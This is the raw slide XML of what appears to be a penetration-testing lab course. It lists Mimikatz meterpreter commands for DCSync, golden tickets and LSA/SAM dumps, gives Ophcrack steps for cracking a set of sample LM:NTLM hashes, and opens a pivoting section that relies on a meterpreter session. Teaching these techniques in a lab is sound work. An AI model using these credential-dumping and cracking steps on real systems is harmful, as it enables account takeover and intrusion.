              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            Retrieve user account NTLM hash, SID and RID via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>golden_ticket_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Create a golden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos_ticket_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   List all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> tickets (unparsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos_ticket_purge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Purge any in-use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos_ticket_use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kiwi_cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>               Execute an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arbitary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> command (unparsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsa_dump_sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           Dump LSA SAM (unparsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsa_dump_secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       Dump LSA secrets (unparsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wifi_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> profiles/creds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23616B4D-AC82-CA4B-99C1-6ADF1244C8CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153431" y="868192"/>
            <a:ext cx="2688551" cy="4199634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369451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FA714C-E737-42A8-B585-F69496B3B017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ophcrack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C65C59-9D0B-4FE3-8E7D-53217E855EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the credentials available to us, let's try using them in ophcrack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First we need to download tables for ophcrack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://ophcrack.sourceforge.net/tables.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_small</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then make a directory and unzip your tables</a:t>
            </a:r>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69DEA9B1-11E4-CC44-AF78-4FFAA37314EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194751" y="3087828"/>
            <a:ext cx="4092694" cy="1788971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3367396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82492C-6AE2-4362-8848-E0F9EBBCFD44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Opcrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56AB27B0-57AC-4922-AF11-D2EB0D0A6AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Opcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and install your tables, select the directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C81950C-5D27-0347-91EF-DD82A7407AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987876" y="2899251"/>
            <a:ext cx="2133600" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD372D7-8BDB-014C-B5CE-5E325EEE45EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821971" y="1924089"/>
            <a:ext cx="3484479" cy="2751823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD27095-E409-4899-84D5-80842969800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5321808" y="1328740"/>
            <a:ext cx="589724" cy="14236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1B84D923-0911-42B8-963C-1DF38D581C0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520892" y="1214394"/>
            <a:ext cx="1308047" cy="9242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93950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D649FD-A9E4-4466-89EC-EC6DECACB5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load and Crack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E376D0-D06F-4455-A418-1E4D55A6E9FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the hashes from Mimikatz, and these extra hashes, insert and begin the cracking process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You may paste them in one at a time, or make &amp; load a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>E52CAC67419A9A22664345140A852F61:A9FDFA038C4B75EBC76DC855DD74F0DA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EFFC30112EFCA0AA058B289431BC7466:F7C371653D584AD7B49D7BD14073EE0C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C2A6A3BBA226DC79AAD3B435B51404EE:46839A2B6FC6CFD4F46D875E3F86B8AF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FBBDA33FC12E83FB0C240E84A183686E:DDE9DC6E34E2E6E11EF9E51C6B27ED96</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FE70541805EF3BD282A5E4BBC00225B3:53C53BA11D51525A952D2AF68F996942</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1E80D1B102B23C08AAD3B435B51404EE:B7CABD6AA9ED1312C4246C442DB84B81</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EF1A26352905DE95AAD3B435B51404EE:7764CC04BA33AED0BA86D73A4C70B272</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FDF06920548704A8AAD3B435B51404EE:7AB32BA68BDB05F3235466C9DF9A1259</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>D22B4945A1EF7291AAD3B435B51404EE:F338168B17B1D2135608965A346EC4F8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>E35B3EC7CA8DC85AAAD3B435B51404EE:0A2E8EB07D78F8615FA69E9CFCFD167B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85CDCA89-791E-4476-AE2A-698C57517E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7491076" y="2027470"/>
            <a:ext cx="1195724" cy="1548679"/>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0270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DD126C-FCF5-4A11-929A-BE8F5DEBD5F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ophcrack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73320ACC-F0F2-4BB8-BF59-917ABC1B49A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which hashes did you crack? Why didn't you get all of them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For extra work, try downloading additional tables, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_special</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to crack all the passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8668708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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Pivoting and Attacking</a:t>
            </a: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84783212"/>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Pivoting Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this last lab section, we need the meterpreter session on the Windows machine from the last lab active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If things get messed up, create a new multi-handler and restart the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil_service</a:t>
            </a:r>
